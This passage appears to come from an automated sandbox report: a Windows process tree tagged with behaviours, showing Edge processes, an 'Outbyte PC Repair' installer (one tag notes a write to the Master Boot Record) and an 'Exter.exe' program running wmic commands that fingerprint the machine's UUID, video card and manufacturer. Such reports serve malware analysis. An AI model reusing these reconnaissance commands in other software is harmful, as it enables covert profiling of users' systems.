C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:5112
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1920
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2140 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc779d3cb8,0x7ffc779d3cc8,0x7ffc779d3cd82⤵PID:4296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:22⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:82⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵PID:856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:2148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:12⤵PID:4692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:12⤵PID:4376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:12⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:12⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:12⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:12⤵PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:12⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:12⤵PID:3420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:12⤵PID:3012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5040 /prefetch:82⤵PID:1148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5032 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:12⤵PID:2036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:12⤵PID:1144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:1944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:12⤵PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:12⤵PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:12⤵PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:12⤵PID:4044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:12⤵PID:1116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:12⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:12⤵PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:12⤵PID:2436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3948 /prefetch:82⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:82⤵PID:4140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:12⤵PID:2428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:12⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:12⤵PID:1092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:12⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6708 /prefetch:82⤵PID:2036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5608 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6020 /prefetch:82⤵PID:3488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:12⤵PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:12⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:12⤵PID:2472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,3194552466159745269,6972210481834098559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7496 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3372
-
-
C:\Users\Admin\Downloads\outbyte-pc-repair.exe"C:\Users\Admin\Downloads\outbyte-pc-repair.exe"2⤵
- Executes dropped EXE
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\is-868877.tmp\Installer.exe"C:\Users\Admin\AppData\Local\Temp\is-868877.tmp\Installer.exe" /spid:1668 /splha:378560643⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4780 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"4⤵
- Modifies registry class
PID:5028
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x32.dll"4⤵
- Modifies registry class
PID:4972
-
-
C:\Program Files (x86)\Outbyte\PC Repair\ServiceHelper.Agent.exe"C:\Program Files (x86)\Outbyte\PC Repair\ServiceHelper.Agent.exe" /install /silent4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1536
-
-
C:\Program Files (x86)\Outbyte\PC Repair\PCRepair.exe"C:\Program Files (x86)\Outbyte\PC Repair\PCRepair.exe" /Install /SendInfo /AutoStart4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:772
-
-
C:\Program Files (x86)\Outbyte\PC Repair\PCRepair.exe"C:\Program Files (x86)\Outbyte\PC Repair\PCRepair.exe" /FromInstaller4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4628 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s /u "C:\Program Files (x86)\Outbyte\PC Repair\LibraryHelper.Agent.dll"5⤵PID:1524
-
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\Outbyte\PC Repair\LibraryHelper.Agent.dll"5⤵
- Modifies registry class
PID:2512
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x32.dll"5⤵
- Modifies registry class
PID:5548
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"5⤵PID:5600
-
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"6⤵
- Modifies registry class
PID:5580
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x32.dll"5⤵
- Modifies registry class
PID:5672
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"5⤵PID:5676
-
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"6⤵
- Modifies registry class
PID:5696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /c java -version5⤵PID:5768
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -version6⤵PID:6044
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x32.dll"5⤵
- Modifies registry class
PID:7840
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"5⤵PID:7856
-
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"6⤵
- Modifies registry class
PID:7868
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x32.dll"5⤵
- Modifies registry class
PID:7928
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"5⤵PID:7944
-
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\Outbyte\PC Repair\BrowserPluginsHelper.Agent.x64.dll"6⤵
- Modifies registry class
PID:7956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /c java -version5⤵PID:8168
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -version6⤵PID:8044
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5040
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2636
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3056
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004E41⤵PID:1964
-
C:\Program Files (x86)\Outbyte\PC Repair\ServiceHelper.Agent.exe"C:\Program Files (x86)\Outbyte\PC Repair\ServiceHelper.Agent.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3336
-
C:\Program Files (x86)\Outbyte\PC Repair\CustomDllSurrogate.x32.exe"C:\Program Files (x86)\Outbyte\PC Repair\CustomDllSurrogate.x32.exe" {16870BDE-2DD8-43FC-B754-69B9F9F2EC37} -Embedding1⤵
- Executes dropped EXE
PID:32
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"1⤵PID:3164
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"2⤵PID:2724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:3192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3128
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"3⤵PID:2428
-
